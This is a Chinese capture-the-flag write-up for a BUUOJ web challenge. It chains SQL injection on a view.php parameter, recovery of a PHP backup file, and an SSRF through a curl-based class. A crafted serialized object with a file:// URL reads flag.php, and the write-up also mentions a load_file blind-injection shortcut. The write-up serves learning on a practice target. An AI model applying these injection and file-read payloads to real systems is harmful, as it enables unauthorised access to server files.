平台:buuoj.cn
打开靶机
有个登录和注册,打开登录框看看
万能密码,sql注入fuzz,弱密码全跑一遍,没什么变化,那就注册看看。
进去之后出现用户记录。
点进用户名看看,这是注意到url:
有可能存在注入,试着让他报错。
单引号测试:
可以看到除了数据库错误外,还直接显示出了物理路径。
把东西先注出来再说,这里过滤了一些东西,我这就直接sqlmap跑一下了,加个–no-cast参数
当然可以手注,看别的师傅是用报错成功注入
一系列流程走一遍最后发现除了admin和passwd外,注出来有个列里有个data序列化字符串:
嗯。。。忽略了一个东西,dirsearch扫一下发现有个robots.txt和flag.php,flag.php应该就是要读取flag的地方了,robots.txt提示有个index,php.bak备份文件,下下来看看:
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}
get方法里有curl函数,翻翻手册:
curl_init:初始化新的会话,返回 cURL 句柄,供curl_setopt()、 curl_exec() 和 curl_close() 函数使用。
curl_setopt:为 cURL 会话句柄设置选项。
curl_exec:执行给定的 cURL 会话。
curl_getinfo:获取最后一次传输的相关信息。
getBlogContents调用get方法
还有个waf限制注册时直接读取flag.php
来看get方法,curl会访问url并返回页面,而getBlogContents则调用get访问blog中的url,因此这里存在SSRF
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)
假如我们把url设定成我们想要的地址,就可以访问服务器内部文件。
结合我们前面得到的序列化,将123.com设定为file协议读取flag.php
<?php
class UserInfo {
public $name = "test";
public $age = 12;
public $blog = "file:///var/www/html/flag.php";
}
$data = new UserInfo();
echo serialize($data);
//O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
最后在view.php?no=1后面构造个联合查询
源码返回base64字符串,解码即得flag
从这位师傅学到了还有个非预期,在view.php?no=*中没有过滤load_file函数,导致可以直接读到flag.php,盲注下/var/www/html/flag.php位置字段即得flag。
4150
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
